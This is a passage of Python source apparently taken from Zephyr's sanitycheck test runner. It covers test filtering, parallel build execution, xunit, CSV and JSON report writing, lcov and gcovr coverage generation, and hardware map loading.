if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_passed) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_passed,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases - self.total_skipped_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run - self.total_skipped}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
self.json_report(filename + ".json", append=only_failed, version=self.version)
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.connected_hardware:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
if self.integration:
instances += list(filter(lambda item: item.platform.name in tc.integration_platforms, \
instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default and \
not inst.platform.name in tc.integration_platforms, instance_list)):
discards[instance] = discards.get(instance, "Not a default test platform")
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
instance.status = "skipped"
instance.fill_results_by_status()
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped', 'error']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.build_only, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception:' % (test,))
for line in traceback.format_exc().splitlines():
logger.error(line)
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if not self.discards:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
logger.debug(f"Unknown status {instance.status}")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def json_report(self, filename, platform=None, append=False, version="NA"):
rowdict = {}
results_dict = {}
rowdict["test_suite"] = []
results_dict["test_details"] = []
new_dict = {}
if platform:
selected = [platform]
else:
selected = self.selected_platforms
rowdict["test_environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
for p in selected:
json_dict = {}
inst = self.get_platform_instances(p)
if os.path.exists(filename) and append:
with open(filename, 'r') as report:
data = json.load(report)
for i in data["test_suite"]:
test_details = i["test_details"]
for test_data in test_details:
if not (test_data["status"]) == "failed":
new_dict = test_data
results_dict["test_details"].append(new_dict)
for _, instance in inst.items():
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
if os.path.exists(filename) and append:
json_dict = {"testcase": instance.testcase.name,
"arch": instance.platform.arch,
"type": instance.testcase.type,
"platform": p,
}
if instance.status in ["error", "failed", "timeout"]:
json_dict["status"] = "failed"
json_dict["reason"] = instance.reason
json_dict["execution_time"] = handler_time
if os.path.exists(handler_log):
json_dict["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
json_dict["device_log"] = self.process_log(device_log)
else:
json_dict["build_log"] = self.process_log(build_log)
results_dict["test_details"].append(json_dict)
else:
for k in instance.results.keys():
json_dict = {"testcase": k,
"arch": instance.platform.arch,
"type": instance.testcase.type,
"platform": p,
}
if instance.results[k] in ["PASS"]:
json_dict["status"] = "passed"
if instance.handler:
json_dict["execution_time"] = handler_time
if ram_size:
json_dict["ram_size"] = ram_size
if rom_size:
json_dict["rom_size"] = rom_size
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout"]:
json_dict["status"] = "failed"
json_dict["reason"] = instance.reason
json_dict["execution_time"] = handler_time
if os.path.exists(handler_log):
json_dict["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
json_dict["device_log"] = self.process_log(device_log)
else:
json_dict["build_log"] = self.process_log(build_log)
else:
json_dict["status"] = "skipped"
json_dict["reason"] = instance.reason
results_dict["test_details"].append(json_dict)
rowdict["test_suite"].append(results_dict)
with open(filename, "wt") as json_file:
json.dump(rowdict, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform, pre_script, is_pty):
device = {
"serial": None,
"platform": platform,
"serial_pty": None,
"counter": 0,
"available": True,
"connected": True,
"pre_script": pre_script
}
if is_pty:
device['serial_pty'] = serial
else:
device['serial'] = serial
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
